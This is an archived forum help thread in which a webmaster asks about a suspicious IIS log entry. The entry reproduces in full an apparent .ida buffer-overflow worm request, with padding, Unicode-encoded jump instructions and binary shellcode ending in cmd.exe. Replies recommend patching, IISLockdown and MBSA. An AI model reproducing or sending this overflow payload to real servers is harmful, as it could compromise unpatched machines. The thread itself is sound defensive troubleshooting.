• Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 346
  • Last Modified:

Log File Records

I have a website (on Win2k & IIS 5.0) that insidently goes down every sunday night.  All this time I suspected ASP.NET being the problem with aspnet_wp.exe not restarting.. but I found an interesting correlation between down time and my log files.

Below is one row of an HTTP Request sent last saturday right before my server went down. I see this post being made about 10 times before my server went down.  Can anyone tell me a bit about this?  

My first assumption was that ASP.NET is crashing IIS and therefor the log files are getting erroniouse input, but looking at the IP below, I suspect wrong doings..  This is not my IP, not my host IP and looks to me like someone is trying to exceed the request buffer and access memory space..

Can anyone tell me what this code would do? How can I secure my server from being effected from this type of attack?

------------------------------------------------- - - [30/Apr/2005:08:59:51 -0800] "GET /NULL.IDA?CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%u898b%u77e8%u0000%u0000%u838b%u0094%u0000%u408b%u0564%u0150%u0000%ue0ff%u9090=x&ë+_됐èõÿÿÿoð}-‹÷f¸H3Éf‹È´™ü¬2Īâú$쟙™eªP(¹)½k7_Þf™q”™™q™™q×›™™Úœ™™qÈ›™™q½š™™Þœ™™q'˜™™Öœ™™Þœ™™qæ›™™Òœ™™qÇ™™™q™™™a™íyÒœ™™Éf+”Ÿ™™Þœ™™Éf+”Ÿ™™¶œ™™Éf+œ™™¢œ™™Éf+œ™™!™™™™ÉÖœ™™Éf+\œ™™!™™™™Éf+Oœ™™ZÒœ™™ó™ó€š˜™™ÉÒœ™™Éf+šŸ™™Z”“Îð÷÷íØìíöØííøúò¹Ï«©”“”“ñ+™™™f+&œ™™¶œ™™q_™™™af–/™™™a™íÎ++++󙦜™™Éñ™™™Úœ™™É¶œ™™Éf+/œ™™a™–™™™ó™¦œ™™ÉÚœ™™ÉÒœ™™Éf+šŸ™™afíý++++ró™ñ™™™Úœ™™ÉÒœ™™Éf+‘Ÿ™™a™í§++++afí¬++++ªBʦœ™™ÊÉÚœ™™É¢œ™™Éf+5œ™™a™í++++p²fffªYÑZªYZªBʽ›™™ÊªBÊÊÊÉf++œ™™a™í’++++½›™™Z!ffffZ™™™™Úœ™™^™Ý™™™Éf+þœ™™Úœ™™ªœ™™ÚÙÚ¥®œ™™Ú¡!˜˜™™ÚµÊʪYÉÉÉÙÉÑÉÉ쟙™ÉªYÉf+™ªœ™™Éf+œ™™®œ™™Éf+œ™™Úœ™™™Zñ™™™óÙf+9œ™™ZªYÉw›™™^™•™™™Éªœ™™É¶œ™™Éf+Åœ™™ªYÉw›™™É¢œ™™É®œ™™Éf+Åœ™™Z™™™™™™™™˜™™™É¸š™™^š‰™™™Ê۝™™ÊÉf+eœ™™Aa™ÁåEZZ‰™™™óŠöš™™Éf+½Ÿ™™öš™™Éf+©Ÿ™™a™í»++++é•ge4a™íŠ++++™¥“íi¥Yíu¥5íqZn4™Z™™™™™™™™™™™™™™™™™™™™Úœ™™Éó›f+€Ÿ™™ó™ó˜ó›f+pœ™™af–™™™Þœ™™¦œ™™^š˜™™™óÊóñff™™Éf+§Ÿ™™a™ìé++++ÿöŸ™™ÿݝ™™蟙™ߝ™™afì–++++q³fffߝ™™Þœ™™ó‰۝™™ÊÉf+iœ™™a™ìº++++óœÞœ™™Éf+lœ™™a™ì’++++Þœ™™ZªYZ›™™ú™™™™™™™™™™™™!™™hî¡ÔÃ+™íž++++ÑrhA꥚jïášj繚b׍ªKÏÎȦšb,ÁŸ™™ªP(žjÿ>í•++++ÀÆ^Û{FÀÆÇSß½šZHxšXªPÿ‘ß…šZXx›šX™šZòŸ™™ZÒŸ™™qÉ™™™þŸ™™Z$Êœ™™^Îq¶™™™ÆÉ«YªPnHek7Á¦™íŽ++++ÉÎFq„™™™ÆžÁÞÞÞÞr@Þ¦™ìSZÊþŸ™™ÉfŠÂZÎ$òŸ™™ÊÉfŽÆZ™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™ÒÜË×ÜÕª«™ÚëüøíüÉðéü™ÞüíÊíøëíìéÐ÷ÿöØ™ÚëüøíüÉëöúüêêØ™ÚõöêüÑø÷ýõü™Éüüò×øôüýÉðéü™ÞõöûøõØõõöú™Îëðíüßðõü™Ëüøýßðõü™Êõüüé™Íüëôð÷øíüÉëöúüêê™ÜáðíÍñëüøý™™Îʫƪ«™êöúòüí™ûð÷ý™õðêíü÷™øúúüéí™êü÷ý™ëüúï™úõöêüêöúòüí™ÎÊØÊíøëíìé™þüíñöêí÷øôü™þüíñöêíûà÷øôü™êüíêöúòöéí™™™ÕöøýÕðûëøëàØ™ÞüíÉëöúØýýëüêê™êëî¨éî™úA®?„cmd.exe$ HTTP/1.1" 404 4203

Thank you all in advance!

- Eyal.
1 Solution
I think this may be a worm attempting to take advantage of this IIS vulnrability:

Is your machine patched with the latest updates for Windows and IIS?
poogy21Author Commented:

All Patches have been installed.  And I'm not entirely sure that this is actually causing any problem.
I guess it could be a worm.  But why whould I get hit by a worm directly from Italy?  You would imagine that I would get hit by networks closer to my ip block.
But it definetly is a reason for concern.

I have a different problem with ASPNET user permissions and restarting the worker process. But I belive this worm / hacker is trigering a worker process restart.  
And since my aspnet_wp.exe is running into permissions problems, my server times out. :(   when it pures..

Any ideas on how to go about filtering or blocking this type of mischif?
WEBINAR: 10 Easy Ways to Lose a Password

Join us on June 27th at 8 am PDT to learn about the methods that hackers use to lift real, working credentials from even the most security-savvy employees. We'll cover the importance of multi-factor authentication and how these solutions can better protect your business!

First, update all the patches and any latest updates...then use IISlockdown to lockdown the IIS webserver...Then you can use MBSA to furthur study the situation..
From the request it seems the requestor is requesting for some junk...Certainly its not a valid request it seems....
Worms can be originated from any place on the planet...Thats the good n bad of internet..when you connect to internet the whole planet is on a single network...
For your ASP.NET question i may not be in a position to solve the issue but you can modify or change it according to your needs with some help from your programmers...
or our EE gurus can definetly help you...
Yes, highly recommend that you download and run MBSA to see if any patches were missed.
You can get it from:

If all patches are up to date then this should not be an issue but by the look of your log file someone (or a worm) appears to be trying to open a remote command prompt (with the CMD.exe at the end of the data).

You could try and push the same code to a test server (if you have one available) to test if your theory on the ASP.net process restart is correct.

Hope this helps.
Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

Join & Write a Comment

Featured Post

Introducing Cloud Class® training courses

Tech changes fast. You can learn faster. That’s why we’re bringing professional training courses to Experts Exchange. With a subscription, you can access all the Cloud Class® courses to expand your education, prep for certifications, and get top-notch instructions.

Tackle projects and never again get stuck behind a technical roadblock.
Join Now